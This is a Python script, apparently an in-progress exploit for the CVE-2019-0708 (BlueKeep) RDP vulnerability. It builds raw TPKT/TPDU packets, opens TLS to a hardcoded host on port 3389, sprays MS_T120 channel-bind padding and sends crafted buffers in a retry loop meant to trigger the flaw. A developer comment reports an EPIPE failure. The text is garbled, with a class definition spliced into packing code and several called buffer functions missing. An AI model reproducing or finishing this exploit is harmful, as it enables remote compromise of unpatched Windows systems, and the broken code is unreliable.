import time import socket import struct from OpenSSL import SSL from OpenSSL.SSL import SysCallError from impacket.impacket.structure import Structure """ alright we're pretty close for right now, but the issue is that we get an error when we connect python rdpborn.py sending packets... all packets sent successfully, attempting to generate session Traceback (most recent call last): File "rdpborn.py", line 440, in main() File "rdpborn.py", line 436, in main session.sendall(bytes(final_bar_bytes)) File "/Users/admin/bin/python/printers/venv/cve-2019-0708/lib/python2.7/site-packages/OpenSSL/SSL.py", line 1773, in sendall self._raise_ssl_error(self._ssl, result) File "/Users/admin/bin/python/printers/venv/cve-2019-0708/lib/python2.7/site-packages/OpenSSL/SSL.py", line 1639, in _raise_ssl_error raise SysCallError(errno, errorcode.get(errno)) OpenSSL.SSL.SysCallError: (32, 'EPIPE') Other than that, it's working pretty well @NullArray. Let me know if you figure anything out that's exciting """ class TpKT(Structure): commonHdr = ( ('Version', 'B=3'), ('Reserved', 'B=0'), ('Length', '>H=len(TPDU)+4'), ('_TPDU', '_-TPDU', 'self["Length"]-4'), ('TPDU', ':=""') ) class TpDU(Structure): commonHdr = ( ('LengthIndicator', 'B=len(VariablePart)+1'), ('Code', 'B=0'), ('VariablePart', ':=""') ) def __init__(self, data=None): Structure.__init__(self, data) self['VariablePart'] = '' class CrTPDU(Structure): commonHdr = ( ('DST-REF', 'h", len(current_buffer)) size1 = struct.pack(">h", len(current_buffer) - 12) size2 = struct.pack(">h", len(current_buffer) - 109) size3 = struct.pack(">h", len(current_buffer) - 118) size4 = struct.pack(">h", len(current_buffer) - 132) size5 = struct.pack(">h", len(current_buffer) - 390) barr = bytearray() barr.extend(map(ord, current_buffer)) barr[2] = size0[0] barr[3] = size0[1] barr[10] = size1[0] barr[11] = size1[1] barr[107] = size2[0] barr[108] = size2[1] barr[116] = 0x81 barr[117] = size3[1] barr[130] = 0x81 barr[131] = size4[1] barr[392] = size5[1] return barr def construct_channel_packets(session): packet1 = b"\x03\x00\x00\x0c\x02\xf0\x80\x04\x01\x00\x01\x00" session.send(packet1) packet2 = b"\x03\x00\x00\x08\x02\xf0\x80\x28" session.send(packet2) session.recv(1024) packet4 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x08\x03\xeb" session.send(packet4) session.recv(1024) packet5 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x08\x03\xec" session.send(packet5) session.recv(1024) packet6 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x08\x03\xed" session.send(packet6) session.recv(1024) packet7 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x08\x03\xee" session.send(packet7) session.recv(1024) packet8 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x08\x03\xef" session.send(packet8) def construct_other(): tpkt = TpKT() tpdu = TpDU() rdp_neg = RdpNegReq() rdp_neg['Type'] = 1 rdp_neg['requestedProtocols'] = 1 tpdu['VariablePart'] = rdp_neg.getData() tpdu['Code'] = 0xe0 tpkt['TPDU'] = tpdu.getData() return tpkt, tpdu, rdp_neg def generate_session(ip_address, port=3389): session = socket.socket() session.connect((ip_address, port)) return session def main(channel=32): ordination = lambda b: map(ord, b) tpkt, tpdu, rdp_ne = construct_other() session = generate_session("10.0.1.55") session.sendall(tpkt.getData()) received = session.recv(1024) if received: ctx = SSL.Context(SSL.TLSv1_METHOD) session = SSL.Connection(ctx, session) session.set_connect_state() session.do_handshake() # icaBindChannel aka MS_T120 padding = channel * "\x4d\x53\x5f\x54\x31\x32\x30\x00\x00\x00\x00\x00" primary_buffer = generate_primary_buffer(padding) bar_bytes = packer(primary_buffer) print("sending packets...") session.sendall(bytes(bar_bytes)) construct_channel_packets(session) secondary_buffer = generate_secondary_buffer() secondary_bar_bytes = bytearray() secondary_bar_bytes.extend(ordination(secondary_buffer)) session.sendall(bytes(secondary_bar_bytes)) third_buffer = generate_third_buffer() third_bary_bytes = bytearray() third_bary_bytes.extend(ordination(third_buffer)) session.sendall(bytes(third_bary_bytes)) fourth_buffer = generate_fourth_buffer() fourth_bar_bytes = bytearray() fourth_bar_bytes.extend(ordination(fourth_buffer)) session.sendall(bytes(fourth_bar_bytes)) fifth_buffer = generate_fifth_buffer() fifth_bar_bytes = bytearray() fifth_bar_bytes.extend(ordination(fifth_buffer)) session.sendall(bytes(fifth_bar_bytes)) print("all packets sent successfully, attempting to generate session") # trying it as a raise condition ... connected = False while not connected: try: time.sleep(3) session.recv(1024) final_buffer = generate_final_buffer() final_bar_bytes = bytearray() final_bar_bytes.extend(ordination(final_buffer)) session.sendall(bytes(final_bar_bytes)) session.recv(1024) connected = True except SysCallError: pass print("connection established") main()